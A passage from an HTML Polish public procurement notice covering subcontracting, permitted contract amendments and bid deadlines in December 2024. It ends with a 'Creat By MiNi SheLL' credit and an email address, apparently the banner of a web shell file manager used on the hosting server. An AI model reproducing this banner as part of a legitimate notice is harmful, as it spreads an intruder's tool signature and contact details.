potwierdzoną<br/>kopię.<br/>5. W zakresie spełnienia warunków udziału w postępowaniu, Wykonawcy wspólnie ubiegający się o zamówienie składają<br/>dokumenty w taki sposób, aby przy ich ocenie wspólnie spełniali w/w warunki.<br/>6. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Wykonawca wskaże w ofercie części<br/>zamówienia, których wykonanie zamierza powierzyć podwykonawcom, oraz poda nazwy ewentualnych podwykonawców,<br/>jeżeli są już znani. Ponadto Wykonawca uprawniony jest do powierzenia wykonania części przedmiotu umowy nowemu<br/>podwykonawcy, zmiany albo rezygnacji z podwykonawcy. Do powierzenia wykonania części przedmiotu umowy nowemu<br/>podwykonawcy, zmiany, wykluczenia lub rezygnacji z podwykonawcy konieczna jest zgoda Zamawiającego w przypadku, o<br/>którym mowa w art. 427 ust. 4 ustawy PZP. W pozostałych przypadkach zmiana podwykonawcy następuję za uprzednim<br/>poinformowaniem o tym fakcie Zamawiającego, dokonanym co najmniej na 5 dni przed dokonaniem zmiany podwykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zwiększenia wartości netto zgodnie z art. 455 ust. 2 ustawy PZP, gdzie łączna wartość<br/>zmian będzie mniejsza niż progi unijne określone na podstawie art. 3 ust. 1 ustawy PZP i jest niższa niz 9,99% wartości<br/>zamówienia, która została określona w § 2 pkt. 1 umowy, a zmiany te nie spowodują zmiany ogólnego charakteru umowy<br/>Strony przewidują możliwość istotnej zmiany umowy poprzez zawarcie pisemnego aneksu pod rygorem nieważności, przy<br/>zachowaniu ryczałtowego charakteru ceny umowy, w następujących przypadkach:<br/>a) terminu wykonania umowy, w szczególności w związku z zaistnieniem odpowiednio udokumentowanych przez<br/>Wykonawcę okoliczności od niego niezależnych ze względu na przyczyny leżące po stronie Zamawiającego lub inne<br/>niezawinione przez Strony przyczyny spowodowane przez tzw. siłę wyższą;<br/>b) zakresu świadczonych usług w związku ze zmianami organizacyjnymi leżącymi po stronie Zamawiającego;<br/>c) w zakresie przedmiotowym (tj. m.in. zmiana techniki świadczenia usługi, zmiana częstotliwości wykonywanych<br/>czynności), ze względu na udokumentowane przyczyny leżące po stronie Zamawiającego, np. zmiany organizacyjne, jeżeli<br/>wymaga tego zapewnienie prawidłowo wykonywanej usługi;<br/>d) zmiana sposobu wykonania części umowy uzasadniona przyczynami technicznymi, w szczególności, gdy wystąpi<br/>konieczność wykonania prac zamiennych niezbędnych do<br/>wykonania przedmiotu umowy ze względu na zasady wiedzy technicznej; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-10 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1024925</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-10 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-08</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com